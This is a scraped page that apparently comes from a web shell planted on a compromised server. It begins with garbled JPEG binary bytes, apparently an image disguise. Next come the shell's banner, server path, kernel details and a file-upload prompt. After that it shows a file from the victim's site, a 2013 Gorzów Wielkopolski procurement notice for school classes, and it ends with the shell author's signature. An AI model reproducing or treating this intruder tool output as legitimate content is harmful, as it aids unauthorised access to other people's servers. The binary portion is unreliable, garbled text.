JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130613/110439-N-2013.html

<p class="kh_header"><b>Gorzów Wielkopolski: Realizacja zajęć pozalekcyjnych ramach projektu: 
Kompleksowe umiejętności- gwarantem przyszłości</b><br>
<b>Numer ogłoszenia: 110439 - 2013; data zamieszczenia: 13.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Gorzów Wlkp. , ul. Sikorskiego 3-4, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7355576, faks 095 7355612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja zajęć pozalekcyjnych ramach projektu: 
Kompleksowe umiejętności- gwarantem przyszłości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa edukacyjna obejmująca prowadzenie zajęć pozalekcyjnych dla uczniów gorzowskich gimnazjów.
Niniejszy przedmiot zamówienia składa się z 3 Zamówień Częściowych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie z art. 67 ust. 1 pkt 6 stawy Pzp. Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego, polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.56.20.00-1, 80.57.00.00-0, 80.58.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy a) spełniają warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia, tj. posiadającymi kwalifikacje do nauczania w gimnazjum zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009 r. Nr 50, poz. 400 ze zmianami). Ponadto każdy wykonawca usługi powinien posiadać stopień awansu zawodowego minimum nauczyciela kontraktowego. W przypadku podmiotów zagranicznych obowiązują  kwalifikacje i wymagania równoważne, zgodnie z przepisami danego kraju- jeżeli oferta składana jest dla Zamówienia Częściowego nr 1
b) spełniają warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia tj. posiadającymi minimum wykształcenie wyższe: pedagogiczne, psychologiczne lub socjologiczne i posiadają doświadczenie w prowadzeniu z zakresie doradztwa edukacyjno-zawodowego w wymiarze minimum 30 godzi- jeżeli oferta składa jest dla Zamówienia Częściowego nr 2
c) spełniają warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia tj. lektorami o najwyższych kwalifikacjach- absolwenci Filologii Angielskiej i Filologii Germańskiej, doświadczeni w pracy z młodzieżą, w tym licencjonowani egzaminatorzy TELC- jeżeli oferta jest składana dla Zamówienia Częściowego nr 3</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca zamierza zatrudnić podwykonawców, wówczas do oferty przedstawi wykaz części zamówienia powierzonych podwykonawcom w załączniku nr 5 do SIWZ- załączyć jeżeli na zastosowanie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonanie innych zmian w umowie, jeżeli konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany są korzystne dla Zamawiającego, np.  1) w przypadku wystąpienia siły wyższej, czyli zdarzenia, którego nie można było przewidzieć, maksymalny okres przesunięcia terminu zakończenia umowy będzie równy okresowi przerwy w świadczeniu usługi. Siła wyższa, to zdarzenie zewnętrzne o obiektywnym małym stopniu prawdopodobieństwa pojawienia 
się zdarzenia w określonej sytuacji, a którego szkodliwe następstwo przy zastosowaniu współczesnej techniki uniemożliwia wykonawcy wykonywanie 
w części lub całości jego zobowiązań; 2) w wyniku zaistnienia okoliczności, których Zamawiający nie mógł przewidzieć w chwili podpisania umowy np.: - wystąpienia nieprzewidzianych oraz niekorzystnych ze względu na m. in. interes publiczny warunków mających wpływ na jakość usługi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gorzow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Gorzowa Wlkp. ul. Sikorskiego 3-4, 66-400 Gorzów Wlkp. II piętro pok. 315.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2013 godzina 10:00, miejsce: Urząd Miasta Gorzowa Wlkp. ul. Sikorskiego 3-4 Kancelaria ogólna (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizacja projektu nr WND-POKL.09.01.02-08-057/11 pod nazwą: Kompleksowe umiejętności - gwarantem przyszłości Funduszu Społecznego Priorytet: IX. Rozwój wykształcenia i kompetencji w regionach, Działanie: 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie: 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grupo utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych Programu Operacyjnego Kapitał Ludzki, w ramach umowy nr UDA-POKL.09.01.02-08-057/11-00 zawartej w dniu 25 kwietnia 2012r. pomiędzy Miastem Gorzów Wlkp. a Województwem Lubuskim..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Realizacja zajęć dydaktyczno- wyrównawczych i specjalistycznych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres merytoryczny zajęć dydaktyczno- wyrównawczych obejmował będzie program gimnazjum, a szczegółowa tematyka zostanie opracowana na podstawie wstępnych testów diagnozujących poziom wiedzy uczniów. W celu zwiększenia efektywności procesu dydaktycznego, do realizacji zajęć należy wykorzystać zestawy interaktywne oraz pomoce dydaktyczne, zakupione w ramach projektu.
Zajęcia dydaktyczno-wyrównawcze realizowane będą z następujących przedmiotów: język polski, matematyka, biologia, fizyka, chemia, geografia, historia, zajęcia interdyscyplinarne, w okresie X-XII 2013 po 20 godzin na 1 grupę i I-VI 2014 po 30 godzin zajęć na 1 grupę (łącznie na 1 grupę/50 zajęć). Efektem zajęć dydaktyczno-wyrównawczych powinien być wzrost u uczniów poziomu wiedzy o 20%, określony na podstawie testu wiedzy przeprowadzonego na początku i końcu zajęć. Zajęcia interdyscyplinarne, w tym obsługa sprzętu. Zajęcia interdyscyplinarne realizowane w Gimnazjum Specjalnym nr 14 pozwolą uczniom nabyć umiejętności w zakresie posługiwania się nowoczesnymi środkami dydaktycznymi  (tablica interaktywna, tablet, sprzęt multimedialny). Nowy, ciekawy i aktywny sposób przyswajania wiedzy prowadzony będzie w zakresach uzgodnionych z Dyrektorem szkoły. Zajęcia specjalistyczne w  zakresie edukacji ratowniczej  Zajęcia specjalistyczne w zakresie edukacji ratowniczej mają na celu uświadomienie młodzieży o grożących niebezpieczeństwach, zapobieganie i minimalizowanie skutków zagrożeń, uwrażliwienie na dbałość o zdrowie i wyposażenie w wiedzę i umiejętności  z zakresu udzielania pierwszej pomocy, a także prawidłowego zachowania się w miejscach wypadku.
Uczniowie mają nie tylko poznać zasady zachowania w szkole, w domu, w innych środowiskach społecznych i przyrodniczych, ale również wdrożyć odpowiednie postępowanie w sytuacji zagrożenia życia, wypadku czy katastrofy, nabyć praktyczne umiejętności udzielania pierwszej pomocy w realnych wydarzeniach.
Zajęcia prowadzone będą przez nauczyciela posiadającego uprawnienia do prowadzenia tego typu zajęć, w formie gier symulacyjnych, ćwiczeń zachowań wg procedur, kursu pierwszej pomocy, warsztatów z higieny i żywienia.
Zajęcia realizowane będą w okresie X-XII 2013 w wymiarze 10 godzin zajęć 
na 1 grupę oraz I-VI 2014 w wymiarze po 20 godzin na 1 grupę. Łącznie utworzonych zostanie 14 grup 5-osobowych, dla których przeprowadzonych zostanie 420 godzin zajęć z wykorzystaniem m.in. fantomu. Efektem zajęć specjalistycznych w zakresie edukacji ratowniczej powinien być wzrost poziomu wiedzy w zakresie udzielania pierwszej pomocy, potwierdzony w protokole 
z egzaminu praktycznego z wykorzystaniem fantomu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.56.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Doradztwo edukacyjno- zawodowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program warsztatów w zakresie doradztwa edukacyjno-zawodowego obejmuje:
Blok I - Edukacja dla potrzeb rynku pracy (3 godziny dydaktyczne) 
Tematy: 1. Będę pracownikiem - praca jako wartość i źródło zaspakajania potrzeb człowieka. 2.Szukam pracownika - kompetencje zawodowe i ponadzawodowe oczekiwane przez pracodawców. 3.Gotowość do zmian warunkiem mobilności zawodowej (przemiany rynku pracy, zawody przyszłości). 4. Oferta instytucji rynku pracy - wsparcie dla absolwentów i osób poszukujących pracy (praca w Unii, przekwalifikowanie, kształcenie ustawiczne).
Blok II - Planowanie kariery edukacyjno - zawodowej przez ucznia szkoły gimnazjalnej (4 godziny dydaktyczne). 
Tematy:
1.Moja kariera - marzenia do spełnienia. Czynniki planowania kariery edukacyjno - zawodowej. 2. Jak planować - zbuduj swoją strategię sukcesu. 3. Tworzenie Indywidualnych Planów Działania jako jeden ze sposobów zarządzania karierą. 4. Efektywne gospodarowanie czasem.
Blok III - Samopoznanie drogą do trafnych decyzji edukacyjnych i zawodowych 
(4 godziny dydaktyczne). 
Tematy: 1. Jaki jestem - wartości i zainteresowania zawodowe. 2. Typ osobowości zawodowej a preferowane środowiska pracy. 3. Bogaty/trudny świat emocji - temperament a wybór zawodu. 4. Bilans wiedzy o sobie - możliwości i ograniczenia.
Blok IV - Sukces na rynku pracy (4 godziny dydaktyczne). 
Tematy: 1. Szukam pracy - metody poszukiwania pracy. 2. Autoprezentacja w procesie rekrutacji. 3. Wizytówka przyszłego pracownika - tworzenie dokumentów aplikacyjnych. 4. Jak rozmawiać z pracodawcą - symulacje rozmów kwalifikacyjnych.
Cel organizacji zajęć:
Doradztwo edukacyjno-zawodowe ma na celu ułatwić uczniom, uczestniczącym 
w warsztatach, określenie własnego profilu edukacyjnego i zawodowego, preferencji zawodowych oraz stworzyć okazję do skonstruowania z doradcą zawodowym INDYWIDUALNEGO PLANU DZIAŁANIA.
W ramach warsztatów realizowanych będzie 15 godzin zajęć w 10-osobowych grupach w okresie od X 2013 do XII 2013  po 1 grupie w Gimnazjum nr 4 i 6 w rytmie 2 razy w miesiącu po 2,5 godziny zajęć oraz 32 godziny zajęć w czterech  5-osobowych grupach w Gimnazjum Specjalnym nr 14 (program warsztatów należy uzgodnić z dyrekcją szkoły w celu dostosowania do możliwości i potrzeb uczniów)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Realizacja zajęć z języków obcych na potrzeby uczniów gimnazjów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia z nauki języków obcych (angielskiego i niemieckiego) mają na celu propagowanie nauki języków obcych, minimalizowanie barier językowych, przygotowanie uczniów do egzaminu gimnazjalnego oraz międzynarodowego egzaminu TELC (The European Language Certificates). Zajęcia mają zapewnić: 
- organizację kursów językowych na wszystkich poziomach zaawansowania (A1, A2, B1, B2), - wykorzystywanie podczas zajęć różnorodnych metod i technik nauczania ze szczególnym naciskiem na komunikację, - test diagnostyczny w celu zakwalifikowania uczniów do grup ze względu na poziom umiejętności językowych,
- zajęcia z lektorami o najwyższych kwalifikacjach- absolwenci Filologii Angielskiej i Filologii Germańskiej, doświadczeni w pracy z młodzieżą, w tym licencjonowani egzaminatorzy TELC.  Pożądane efekty zrealizowanych zajęć:
1) wzrost umiejętności posługiwania się językiem obcym (j. angielski, j. niemiecki) o 20%  u minimum 56 uczniów, potwierdzony wynikami testu wiedzy przeprowadzonego  na początku i końcu 50-godzinnego cyklu zajęć, w postaci raportu, 2) przystąpienie 14 uczniów do egzaminu TELC..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.58.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com